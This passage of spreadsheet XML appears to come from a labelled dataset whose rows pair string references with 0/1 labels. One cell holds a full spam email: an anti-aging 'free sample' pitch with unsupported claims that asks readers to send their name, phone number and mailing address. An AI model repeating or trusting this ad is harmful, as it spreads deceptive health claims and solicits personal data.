        <v>1.0</v>
      </c>
    </row>
    <row r="5641">
      <c r="A5641" s="1">
        <v>5639.0</v>
      </c>
      <c r="B5641" s="1" t="s">
        <v>4414</v>
      </c>
      <c r="C5641" s="1" t="s">
        <v>4415</v>
      </c>
      <c r="D5641" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5642">
      <c r="A5642" s="1">
        <v>5640.0</v>
      </c>
      <c r="B5642" s="1" t="s">
        <v>7672</v>
      </c>
      <c r="C5642" s="1" t="s">
        <v>7673</v>
      </c>
      <c r="D5642" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5643" hidden="1">
      <c r="A5643" s="1">
        <v>5641.0</v>
      </c>
      <c r="B5643" s="1" t="s">
        <v>7674</v>
      </c>
      <c r="C5643" s="1" t="s">
        <v>7675</v>
      </c>
      <c r="D5643" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5644">
      <c r="A5644" s="1">
        <v>5642.0</v>
      </c>
      <c r="B5644" s="1" t="s">
        <v>7676</v>
      </c>
      <c r="C5644" s="1" t="s">
        <v>7677</v>
      </c>
      <c r="D5644" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5645" hidden="1">
      <c r="A5645" s="1">
        <v>5643.0</v>
      </c>
      <c r="B5645" s="1" t="s">
        <v>3295</v>
      </c>
      <c r="C5645" s="1" t="s">
        <v>3296</v>
      </c>
      <c r="D5645" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5646" hidden="1">
      <c r="A5646" s="1">
        <v>5644.0</v>
      </c>
      <c r="B5646" s="1" t="s">
        <v>986</v>
      </c>
      <c r="C5646" s="1" t="s">
        <v>7678</v>
      </c>
      <c r="D5646" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5647" hidden="1">
      <c r="A5647" s="1">
        <v>5645.0</v>
      </c>
      <c r="B5647" s="1" t="s">
        <v>1684</v>
      </c>
      <c r="C5647" s="1" t="s">
        <v>1701</v>
      </c>
      <c r="D5647" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5648" hidden="1">
      <c r="A5648" s="1">
        <v>5646.0</v>
      </c>
      <c r="B5648" s="1" t="s">
        <v>803</v>
      </c>
      <c r="C5648" s="1" t="s">
        <v>7679</v>
      </c>
      <c r="D5648" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5649" hidden="1">
      <c r="A5649" s="1">
        <v>5647.0</v>
      </c>
      <c r="B5649" s="1" t="s">
        <v>7680</v>
      </c>
      <c r="C5649" s="1" t="s">
        <v>7681</v>
      </c>
      <c r="D5649" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5650">
      <c r="A5650" s="1">
        <v>5648.0</v>
      </c>
      <c r="B5650" s="1" t="s">
        <v>7682</v>
      </c>
      <c r="C5650" s="1" t="s">
        <v>7683</v>
      </c>
      <c r="D5650" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5651" hidden="1">
      <c r="A5651" s="1">
        <v>5649.0</v>
      </c>
      <c r="B5651" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C5651" s="1" t="s">
        <v>5994</v>
      </c>
      <c r="D5651" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5652" hidden="1">
      <c r="A5652" s="1">
        <v>5650.0</v>
      </c>
      <c r="B5652" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C5652" s="1" t="s">
        <v>7684</v>
      </c>
      <c r="D5652" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5653" hidden="1">
      <c r="A5653" s="1">
        <v>5651.0</v>
      </c>
      <c r="B5653" s="1" t="s">
        <v>5158</v>
      </c>
      <c r="C5653" s="1" t="s">
        <v>5159</v>
      </c>
      <c r="D5653" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5654" hidden="1">
      <c r="A5654" s="1">
        <v>5652.0</v>
      </c>
      <c r="B5654" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C5654" s="1" t="s">
        <v>7685</v>
      </c>
      <c r="D5654" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5655" hidden="1">
      <c r="A5655" s="1">
        <v>5653.0</v>
      </c>
      <c r="B5655" s="1" t="s">
        <v>4147</v>
      </c>
      <c r="C5655" s="1" t="s">
        <v>4148</v>
      </c>
      <c r="D5655" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5656" hidden="1">
      <c r="A5656" s="1">
        <v>5654.0</v>
      </c>
      <c r="B5656" s="1" t="s">
        <v>261</v>
      </c>
      <c r="C5656" s="1" t="s">
        <v>7686</v>
      </c>
      <c r="D5656" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5657" hidden="1">
      <c r="A5657" s="1">
        <v>5655.0</v>
      </c>
      <c r="B5657" s="1" t="s">
        <v>3702</v>
      </c>
      <c r="C5657" s="1" t="s">
        <v>3703</v>
      </c>
      <c r="D5657" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5658" hidden="1">
      <c r="A5658" s="1">
        <v>5656.0</v>
      </c>
      <c r="B5658" s="1" t="s">
        <v>6608</v>
      </c>
      <c r="C5658" s="1" t="s">
        <v>6609</v>
      </c>
      <c r="D5658" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5659" hidden="1">
      <c r="A5659" s="1">
        <v>5657.0</v>
      </c>
      <c r="B5659" s="1" t="s">
        <v>6698</v>
      </c>
      <c r="C5659" s="1" t="s">
        <v>6699</v>
      </c>
      <c r="D5659" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5660">
      <c r="A5660" s="1">
        <v>5658.0</v>
      </c>
      <c r="B5660" s="1" t="s">
        <v>7687</v>
      </c>
      <c r="C5660" s="1" t="s">
        <v>7688</v>
      </c>
      <c r="D5660" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5661" hidden="1">
      <c r="A5661" s="1">
        <v>5659.0</v>
      </c>
      <c r="B5661" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C5661" s="1" t="s">
        <v>308</v>
      </c>
      <c r="D5661" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5662" hidden="1">
      <c r="A5662" s="1">
        <v>5660.0</v>
      </c>
      <c r="B5662" s="1" t="s">
        <v>6345</v>
      </c>
      <c r="C5662" s="1" t="s">
        <v>6346</v>
      </c>
      <c r="D5662" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5663">
      <c r="A5663" s="1">
        <v>5661.0</v>
      </c>
      <c r="B5663" s="1" t="s">
        <v>571</v>
      </c>
      <c r="C5663" s="1" t="s">
        <v>7689</v>
      </c>
      <c r="D5663" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5664" hidden="1">
      <c r="A5664" s="1">
        <v>5662.0</v>
      </c>
      <c r="B5664" s="1" t="s">
        <v>7690</v>
      </c>
      <c r="C5664" s="1" t="s">
        <v>7691</v>
      </c>
      <c r="D5664" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5665" hidden="1">
      <c r="A5665" s="1">
        <v>5663.0</v>
      </c>
      <c r="B5665" s="1" t="s">
        <v>7692</v>
      </c>
      <c r="C5665" s="1" t="s">
        <v>7693</v>
      </c>
      <c r="D5665" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5666" hidden="1">
      <c r="A5666" s="1">
        <v>5664.0</v>
      </c>
      <c r="B5666" s="1" t="s">
        <v>2573</v>
      </c>
      <c r="C5666" s="1" t="s">
        <v>7694</v>
      </c>
      <c r="D5666" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5667" hidden="1">
      <c r="A5667" s="1">
        <v>5665.0</v>
      </c>
      <c r="B5667" s="1" t="s">
        <v>7038</v>
      </c>
      <c r="C5667" s="1" t="s">
        <v>7039</v>
      </c>
      <c r="D5667" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5668" hidden="1">
      <c r="A5668" s="1">
        <v>5666.0</v>
      </c>
      <c r="B5668" s="1" t="s">
        <v>5559</v>
      </c>
      <c r="C5668" s="1" t="s">
        <v>5560</v>
      </c>
      <c r="D5668" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5669" hidden="1">
      <c r="A5669" s="1">
        <v>5667.0</v>
      </c>
      <c r="B5669" s="1" t="s">
        <v>1979</v>
      </c>
      <c r="C5669" s="1" t="s">
        <v>4624</v>
      </c>
      <c r="D5669" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5670" hidden="1">
      <c r="A5670" s="1">
        <v>5668.0</v>
      </c>
      <c r="B5670" s="1" t="s">
        <v>5830</v>
      </c>
      <c r="C5670" s="1" t="s">
        <v>5831</v>
      </c>
      <c r="D5670" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5671" hidden="1">
      <c r="A5671" s="1">
        <v>5669.0</v>
      </c>
      <c r="B5671" s="1" t="s">
        <v>7695</v>
      </c>
      <c r="C5671" s="1" t="s">
        <v>7696</v>
      </c>
      <c r="D5671" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5672" hidden="1">
      <c r="A5672" s="1">
        <v>5670.0</v>
      </c>
      <c r="B5672" s="1" t="s">
        <v>7697</v>
      </c>
      <c r="C5672" s="1" t="s">
        <v>7698</v>
      </c>
      <c r="D5672" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5673" hidden="1">
      <c r="A5673" s="1">
        <v>5671.0</v>
      </c>
      <c r="B5673" s="1" t="s">
        <v>3818</v>
      </c>
      <c r="C5673" s="1" t="s">
        <v>3819</v>
      </c>
      <c r="D5673" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5674" hidden="1">
      <c r="A5674" s="1">
        <v>5672.0</v>
      </c>
      <c r="B5674" s="1" t="s">
        <v>3774</v>
      </c>
      <c r="C5674" s="1" t="s">
        <v>7699</v>
      </c>
      <c r="D5674" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5675" hidden="1">
      <c r="A5675" s="1">
        <v>5673.0</v>
      </c>
      <c r="B5675" s="1" t="s">
        <v>4811</v>
      </c>
      <c r="C5675" s="1" t="s">
        <v>7700</v>
      </c>
      <c r="D5675" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5676" hidden="1">
      <c r="A5676" s="1">
        <v>5674.0</v>
      </c>
      <c r="B5676" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C5676" s="1" t="s">
        <v>5248</v>
      </c>
      <c r="D5676" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5677">
      <c r="A5677" s="1">
        <v>5675.0</v>
      </c>
      <c r="B5677" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="C5677" s="1" t="s">
        <v>2192</v>
      </c>
      <c r="D5677" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5678" hidden="1">
      <c r="A5678" s="1">
        <v>5676.0</v>
      </c>
      <c r="B5678" s="1" t="s">
        <v>2622</v>
      </c>
      <c r="C5678" s="1" t="s">
        <v>7701</v>
      </c>
      <c r="D5678" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5679">
      <c r="A5679" s="1">
        <v>5677.0</v>
      </c>
      <c r="B5679" s="1" t="s">
        <v>6020</v>
      </c>
      <c r="C5679" s="1" t="s">
        <v>6021</v>
      </c>
      <c r="D5679" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5680" hidden="1">
      <c r="A5680" s="1">
        <v>5678.0</v>
      </c>
      <c r="B5680" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="C5680" s="1" t="s">
        <v>7702</v>
      </c>
      <c r="D5680" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5681" hidden="1">
      <c r="A5681" s="1">
        <v>5679.0</v>
      </c>
      <c r="B5681" s="1" t="s">
        <v>3010</v>
      </c>
      <c r="C5681" s="1" t="s">
        <v>3011</v>
      </c>
      <c r="D5681" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5682" hidden="1">
      <c r="A5682" s="1">
        <v>5680.0</v>
      </c>
      <c r="B5682" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C5682" s="1" t="s">
        <v>7703</v>
      </c>
      <c r="D5682" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5683" hidden="1">
      <c r="A5683" s="1">
        <v>5681.0</v>
      </c>
      <c r="B5683" s="1" t="s">
        <v>383</v>
      </c>
      <c r="C5683" s="1" t="s">
        <v>7704</v>
      </c>
      <c r="D5683" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5684">
      <c r="A5684" s="1">
        <v>5682.0</v>
      </c>
      <c r="B5684" s="1" t="s">
        <v>7705</v>
      </c>
      <c r="C5684" s="1" t="s">
        <v>7706</v>
      </c>
      <c r="D5684" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5685" hidden="1">
      <c r="A5685" s="1">
        <v>5683.0</v>
      </c>
      <c r="B5685" s="1" t="s">
        <v>7707</v>
      </c>
      <c r="C5685" s="1" t="s">
        <v>7708</v>
      </c>
      <c r="D5685" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5686" hidden="1">
      <c r="A5686" s="1">
        <v>5684.0</v>
      </c>
      <c r="B5686" s="1" t="s">
        <v>6562</v>
      </c>
      <c r="C5686" s="1" t="s">
        <v>7709</v>
      </c>
      <c r="D5686" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5687">
      <c r="A5687" s="1">
        <v>5685.0</v>
      </c>
      <c r="B5687" s="1" t="s">
        <v>7710</v>
      </c>
      <c r="C5687" s="1" t="s">
        <v>7711</v>
      </c>
      <c r="D5687" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5688" hidden="1">
      <c r="A5688" s="1">
        <v>5686.0</v>
      </c>
      <c r="B5688" s="1" t="s">
        <v>7712</v>
      </c>
      <c r="C5688" s="1" t="s">
        <v>7713</v>
      </c>
      <c r="D5688" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5689">
      <c r="A5689" s="1">
        <v>5687.0</v>
      </c>
      <c r="B5689" s="1" t="s">
        <v>7714</v>
      </c>
      <c r="C5689" s="1" t="s">
        <v>7715</v>
      </c>
      <c r="D5689" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5690" hidden="1">
      <c r="A5690" s="1">
        <v>5688.0</v>
      </c>
      <c r="B5690" s="1" t="s">
        <v>7716</v>
      </c>
      <c r="C5690" s="1" t="s">
        <v>7717</v>
      </c>
      <c r="D5690" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5691" hidden="1">
      <c r="A5691" s="1">
        <v>5689.0</v>
      </c>
      <c r="B5691" s="1" t="s">
        <v>7718</v>
      </c>
      <c r="C5691" s="1" t="s">
        <v>7719</v>
      </c>
      <c r="D5691" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5692" hidden="1">
      <c r="A5692" s="1">
        <v>5690.0</v>
      </c>
      <c r="B5692" s="1" t="s">
        <v>7720</v>
      </c>
      <c r="C5692" s="1" t="s">
        <v>7721</v>
      </c>
      <c r="D5692" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5693" hidden="1">
      <c r="A5693" s="1">
        <v>5691.0</v>
      </c>
      <c r="B5693" s="1" t="s">
        <v>270</v>
      </c>
      <c r="C5693" s="1" t="s">
        <v>7722</v>
      </c>
      <c r="D5693" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5694" hidden="1">
      <c r="A5694" s="1">
        <v>5692.0</v>
      </c>
      <c r="B5694" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C5694" s="1" t="s">
        <v>7723</v>
      </c>
      <c r="D5694" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5695">
      <c r="A5695" s="1">
        <v>5693.0</v>
      </c>
      <c r="B5695" s="1" t="s">
        <v>7724</v>
      </c>
      <c r="C5695" s="1" t="s">
        <v>7725</v>
      </c>
      <c r="D5695" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5696">
      <c r="A5696" s="1">
        <v>5694.0</v>
      </c>
      <c r="B5696" s="1" t="s">
        <v>6357</v>
      </c>
      <c r="C5696" s="1" t="s">
        <v>6358</v>
      </c>
      <c r="D5696" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5697" hidden="1">
      <c r="A5697" s="1">
        <v>5695.0</v>
      </c>
      <c r="B5697" s="1" t="s">
        <v>3805</v>
      </c>
      <c r="C5697" s="1" t="s">
        <v>3806</v>
      </c>
      <c r="D5697" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5698" hidden="1">
      <c r="A5698" s="1">
        <v>5696.0</v>
      </c>
      <c r="B5698" s="1" t="s">
        <v>3203</v>
      </c>
      <c r="C5698" s="1" t="s">
        <v>3204</v>
      </c>
      <c r="D5698" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5699" hidden="1">
      <c r="A5699" s="1">
        <v>5697.0</v>
      </c>
      <c r="B5699" s="1" t="s">
        <v>1601</v>
      </c>
      <c r="C5699" s="1" t="s">
        <v>5665</v>
      </c>
      <c r="D5699" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5700">
      <c r="A5700" s="1">
        <v>5698.0</v>
      </c>
      <c r="B5700" s="1" t="s">
        <v>7726</v>
      </c>
      <c r="C5700" s="1" t="s">
        <v>7727</v>
      </c>
      <c r="D5700" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5701" hidden="1">
      <c r="A5701" s="1">
        <v>5699.0</v>
      </c>
      <c r="B5701" s="1" t="s">
        <v>2571</v>
      </c>
      <c r="C5701" s="1" t="s">
        <v>6987</v>
      </c>
      <c r="D5701" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5702" hidden="1">
      <c r="A5702" s="1">
        <v>5700.0</v>
      </c>
      <c r="B5702" s="1" t="s">
        <v>7728</v>
      </c>
      <c r="C5702" s="1" t="s">
        <v>7729</v>
      </c>
      <c r="D5702" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5703">
      <c r="A5703" s="1">
        <v>5701.0</v>
      </c>
      <c r="B5703" s="1" t="s">
        <v>7730</v>
      </c>
      <c r="C5703" s="1" t="s">
        <v>7731</v>
      </c>
      <c r="D5703" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5704" hidden="1">
      <c r="A5704" s="1">
        <v>5702.0</v>
      </c>
      <c r="B5704" s="1" t="s">
        <v>7732</v>
      </c>
      <c r="C5704" s="1" t="s">
        <v>7733</v>
      </c>
      <c r="D5704" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5705">
      <c r="A5705" s="1">
        <v>5703.0</v>
      </c>
      <c r="B5705" s="1" t="s">
        <v>7734</v>
      </c>
      <c r="C5705" s="1" t="s">
        <v>7735</v>
      </c>
      <c r="D5705" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5706" hidden="1">
      <c r="A5706" s="1">
        <v>5704.0</v>
      </c>
      <c r="B5706" s="1" t="s">
        <v>7447</v>
      </c>
      <c r="C5706" s="1" t="s">
        <v>7448</v>
      </c>
      <c r="D5706" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5707" hidden="1">
      <c r="A5707" s="1">
        <v>5705.0</v>
      </c>
      <c r="B5707" s="1" t="s">
        <v>605</v>
      </c>
      <c r="C5707" s="1" t="s">
        <v>7736</v>
      </c>
      <c r="D5707" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5708" hidden="1">
      <c r="A5708" s="1">
        <v>5706.0</v>
      </c>
      <c r="B5708" s="1" t="s">
        <v>7737</v>
      </c>
      <c r="C5708" s="1" t="s">
        <v>7738</v>
      </c>
      <c r="D5708" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5709">
      <c r="A5709" s="1">
        <v>5707.0</v>
      </c>
      <c r="B5709" s="1" t="s">
        <v>7739</v>
      </c>
      <c r="C5709" s="3" t="str">
        <f>=========================================================================================
 THIS E-MAIL AD IS BEING SENT IN FULL COMPLIANCE WITH U.S. SENATE BILL 1618, TITLE #3, SECTION 301
 TO REMOVE YOURSELF SEND A BLANK E-MAIL TO: removal992002@yahoo.com
 THIS IS A FREE OFFER!
 ==========================================================================================
 New Scientific Breakthru has taken (10 years) off
 my face in (2 weeks). I was stunned by how fast this product
 worked.
 ***Look 10-20 years younger in weeks! \\\***
 Nature's answer to fast results for aging skin, stimulates
 collagen formation, reduces cell damage from sun exposure
 and protects against skin disorders.
 Quick and dramatic results for dark circles, wrinkles, age spots and
 unhealthy cellulite.
 Developed by world renowned Dermatologist and comes with a
 90 day money back guarantee, therefore you have nothing to lose.
 ==========================================================================================
     If you are interested in receiving a FREE sample of an amzing product that is guaranteed to deliver quick and dramatic results for people interested in looking 10-20 years younger,then please take advantage of our free offer.
 We so much believe in our product that we are willing to invest in the costs of letting you try it for free!
 If you would like to try a FREE SAMPLE and and receive a FREE TAPE, then simply send a blank email with the words "SUBSCRIBE FOR FREE SAMPLE AND TAPE"  in the subject area to:
      fountainofyouth101@yahoo.com
 ***For faster delivery of your "FREE SAMPLE AND TAPE", please include the following information in your e-mail:
 Name:
 Phone #:(optional)
 E-Mail address:
 Mailing Address:
 ===========================================================================================
 You will be contacted with in 24 hours SO WE CAN VERIFY YOUR INFORMATION AND PROCESS YOUR FREE SAMPLE SHIPMENT.
 Thank you,
 Health Associates, Int'l
 ===========================================================================================
 ybsihxtsqawuwgu
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D5709" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5710">
      <c r="A5710" s="1">
        <v>5708.0</v>
      </c>
      <c r="B5710" s="1" t="s">
        <v>7740</v>
      </c>
      <c r="C5710" s="1" t="s">
        <v>7741</v>
      </c>
      <c r="D5710" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5711" hidden="1">
      <c r="A5711" s="1">
        <v>5709.0</v>
      </c>
      <c r="B5711" s="1" t="s">
        <v>7742</v>
      </c>
      <c r="C5711" s="1" t="s">
        <v>7743</v>
      </c>
      <c r="D5711" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5712" hidden="1">
      <c r="A5712" s="1">
        <v>5710.0</v>
      </c>
      <c r="B5712" s="1" t="s">
        <v>745</v>
      </c>
      <c r="C5712" s="1" t="s">
        <v>7744</v>
      </c>
      <c r="D5712" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5713" hidden="1">
      <c r="A5713" s="1">
        <v>5711.0</v>
      </c>
      <c r="B5713" s="1" t="s">
        <v>6919</v>
      </c>
      <c r="C5713" s="1" t="s">
        <v>6920</v>
      </c>
      <c r="D5713" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5714" hidden="1">
      <c r="A5714" s="1">
        <v>5712.0</v>
      </c>
      <c r="B5714" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C5714" s="1" t="s">
        <v>7745</v>
      </c>
      <c r="D5714" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5715" hidden="1">
      <c r="A5715" s="1">
        <v>5713.0</v>
      </c>
      <c r="B5715" s="1" t="s">
        <v>3163</v>
      </c>
      <c r="C5715" s="1" t="s">
        <v>7746</v>
      </c>
      <c r="D5715" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5716" hidden="1">
      <c r="A5716" s="1">
        <v>5714.0</v>
      </c>
      <c r="B5716" s="1" t="s">
        <v>7747</v>
      </c>
      <c r="C5716" s="1" t="s">
        <v>7748</v>
      </c>
      <c r="D5716" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5717" hidden="1">
      <c r="A5717" s="1">
        <v>5715.0</v>
      </c>
      <c r="B5717" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C5717" s="1" t="s">
        <v>7749</v>
      </c>
      <c r="D5717" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5718" hidden="1">
      <c r="A5718" s="1">
        <v>5716.0</v>
      </c>
      <c r="B5718" s="1" t="s">
        <v>7645</v>
      </c>
      <c r="C5718" s="1" t="s">
        <v>7646</v>
      </c>
      <c r="D5718" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5719">
      <c r="A5719" s="1">
        <v>5717.0</v>
      </c>
      <c r="B5719" s="1" t="s">
        <v>6823</v>
      </c>
      <c r="C5719" s="1" t="s">
        <v>7750</v>
      </c>
      <c r="D5719" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5720" hidden="1">
      <c r="A5720" s="1">
        <v>5718.0</v>
      </c>
      <c r="B5720" s="1" t="s">
        <v>6345</v>
      </c>
      <c r="C5720" s="1" t="s">
        <v>6346</v>
      </c>
      <c r="D5720" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5721" hidden="1">
      <c r="A5721" s="1">
        <v>5719.0</v>
      </c>
      <c r="B5721" s="1" t="s">
        <v>5784</v>
      </c>
      <c r="C5721" s="1" t="s">
        <v>5785</v>
      </c>
      <c r="D5721" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5722">
      <c r="A5722" s="1">
        <v>5720.0</v>
      </c>
      <c r="B5722" s="1" t="s">
        <v>7751</v>
      </c>
      <c r="C5722" s="1" t="s">
        <v>7752</v>
      </c>
      <c r="D5722" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5723" hidden="1">
      <c r="A5723" s="1">
        <v>5721.0</v>
      </c>
      <c r="B5723" s="1" t="s">
        <v>7753</v>
      </c>
      <c r="C5723" s="1" t="s">
        <v>7754</v>
      </c>
      <c r="D5723" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5724" hidden="1">
      <c r="A5724" s="1">
        <v>5722.0</v>
      </c>
      <c r="B5724" s="1" t="s">
        <v>1407</v>
      </c>
      <c r="C5724" s="1" t="s">
        <v>7755</v>
      </c>
      <c r="D5724" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5725" hidden="1">
      <c r="A5725" s="1">
        <v>5723.0</v>
      </c>
      <c r="B5725" s="1" t="s">
        <v>1341</v>
      </c>
      <c r="C5725" s="1" t="s">
        <v>1342</v>
      </c>
      <c r="D5725" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5726" hidden="1">
      <c r="A5726" s="1">
        <v>5724.0</v>
      </c>
      <c r="B5726" s="1" t="s">
        <v>7756</v>
      </c>
      <c r="C5726" s="1" t="s">
        <v>7757</v>
      </c>
      <c r="D5726" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5727" hidden="1">
      <c r="A5727" s="1">
        <v>5725.0</v>
      </c>
      <c r="B5727" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C5727" s="1" t="s">
        <v>7758</v>
      </c>
      <c r="D5727" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5728" hidden="1">
      <c r="A5728" s="1">
        <v>5726.0</v>
      </c>
      <c r="B5728" s="1" t="s">
        <v>1299</v>
      </c>
      <c r="C5728" s="1" t="s">
        <v>7759</v>
      </c>
      <c r="D5728" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5729">
      <c r="A5729" s="1">
        <v>5727.0</v>
      </c>
      <c r="B5729" s="1" t="s">
        <v>7760</v>
      </c>
      <c r="C5729" s="1" t="s">
        <v>7761</v>
      </c>
      <c r="D5729" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5730">
      <c r="A5730" s="1">
        <v>5728.0</v>
      </c>
      <c r="B5730" s="1" t="s">
        <v>7762</v>
      </c>
      <c r="C5730" s="1" t="s">
        <v>4366</v>
      </c>
      <c r="D5730" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5731" hidden="1">
      <c r="A5731" s="1">
        <v>5729.0</v>
      </c>
      <c r="B5731" s="1" t="s">
        <v>7763</v>
      </c>
      <c r="C5731" s="1" t="s">
        <v>7764</v>
      </c>
      <c r="D5731" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5732" hidden="1">
      <c r="A5732" s="1">
        <v>5730.0</v>
      </c>
      <c r="B5732" s="1" t="s">
        <v>2131</v>
      </c>
      <c r="C5732" s="1" t="s">
        <v>2132</v>
      </c>
      <c r="D5732" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5733">
      <c r="A5733" s="1">
        <v>5731.0</v>
      </c>
      <c r="B5733" s="1" t="s">
        <v>7765</v>
      </c>
      <c r="C5733" s="1" t="s">
        <v>7766</v>
      </c>
      <c r="D5733" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5734" hidden="1">
      <c r="A5734" s="1">
        <v>5732.0</v>
      </c>
      <c r="B5734" s="1" t="s">
        <v>2475</v>
      </c>
      <c r="C5734" s="1" t="s">
        <v>3899</v>
      </c>
      <c r="D5734" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5735" hidden="1">
      <c r="A5735" s="1">
        <v>5733.0</v>
      </c>
      <c r="B5735" s="1" t="s">
        <v>7190</v>
      </c>
      <c r="C5735" s="1" t="s">
        <v>7191</v>
      </c>
      <c r="D5735" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5736" hidden="1">
      <c r="A5736" s="1">
        <v>5734.0</v>
      </c>
      <c r="B5736" s="1" t="s">
        <v>418</v>
      </c>
      <c r="C5736" s="1" t="s">
        <v>3624</v>
      </c>
      <c r="D5736" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5737" hidden="1">
      <c r="A5737" s="1">
        <v>5735.0</v>
      </c>
      <c r="B5737" s="1" t="s">
        <v>7767</v>
      </c>
      <c r="C5737" s="1" t="s">
        <v>7768</v>
      </c>
      <c r="D5737" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5738" hidden="1">
      <c r="A5738" s="1">
        <v>5736.0</v>
      </c>
      <c r="B5738" s="1" t="s">
        <v>2249</v>
      </c>
      <c r="C5738" s="1" t="s">
        <v>2250</v>
      </c>
